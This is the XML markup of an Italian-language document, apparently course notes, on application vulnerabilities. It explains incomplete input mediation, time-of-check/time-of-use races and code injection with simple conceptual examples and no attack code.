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2"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilità applicazioni</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pP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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Alcune classi di errori che affliggono molto del software esistente:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Mediazione incompleta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Tempo di controllo/tempo di utilizzo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Code injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="734"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Principale vulnerabilità: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Validazione dell'input mancante o incompleta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
        </w:rPr>
        <w:t xml:space="preserve">Mediazione incompleta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Vi sono dati sensibili sui quali vengono effettuate operazioni critiche (es: per sicurezza o per la logica dell’applicazione)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">I dati sono in condizione esposta, non controllata: dati modificabili dall’utente non sono controllati</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="724"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">applicazione web</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b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:hyperlink r:id="rId10" w:tooltip="http://www.ecommerce.com/applicazioni/inpututente?param1=00 0203356155¶m2=2022Sep20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
            <w:b/>
            <w:bCs/>
            <w:highlight w:val="none"/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          </w:rPr>
          <w:t xml:space="preserve">http://www.ecommerce.com/applicazioni/inpututente?param1=00 0203356155&amp;m2=2022Sep20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="870"/>
            <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
            <w:b/>
            <w:highlight w:val="none"/>
          </w:rPr>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Parametri passati al server mediante richieste GET e query string:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Parametro 1: numero identificativo dell'utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Parametro 2: una data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa succederebbe inserendo nel parametro 2 qualcosa tipo: 1800Jan01, 2022Feb30, 2022Ord66?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Errore di sistema perché qualche applicativo si troverebbe a gestire una data o un mese inesistenteo non significativo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="716"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="717"/>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
        </w:rPr>
        <w:t xml:space="preserve">Time of Check to Time of Use</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Tipico scenario che causa problemi di sicurezza:</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highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">una operazione sensibile può essere effettuata solo se una certa condizione è vera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> e l</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">a verifica della condizione avviene prima dell'esecuzione dell'operazione. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">La condizione diventa falsa dopo la verifica, ma prima dell'esecuzione dell'operazione</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="724"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">applicazione web</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b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Sito wikipedia-like: gli </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti possono modificare pagine web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve"> e gli amministratori possono modificare e bloccare pagine web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Se </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">un utente vuole modificare una pagina web e la pagina non è bloccata, ovvero </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">l'applicazione Web consente la modifica all'utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">, se </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">un amministratore blocca la pagina dopo che l'autorizzazione è stata concessa, ma prima che l'utente abbia modificato la pagina, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">l'utente è stato in grado di modificare nonostante il blocco, sfruttando l'autorizzazione ottenuta in precedenza.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="716"/>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
          <w:highlight w:val="none"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:color w:val="0070c0"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Code Injection</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Tecnica per "iniettare" codice malevolo in una applicazione sfruttando vulnerabilità e mancato controllo dell'input allo scopo di</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">:</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Acquisire informazioni</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Web defacement</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Privilege escalation to root</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Installazione di malware</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
        <w:t xml:space="preserve">Furto di sessioni o cookies web browser</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="892"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:highlight w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Caladea" w:hAnsi="Caladea" w:cs="Caladea"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="none"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio</w:t>
      </w:r>
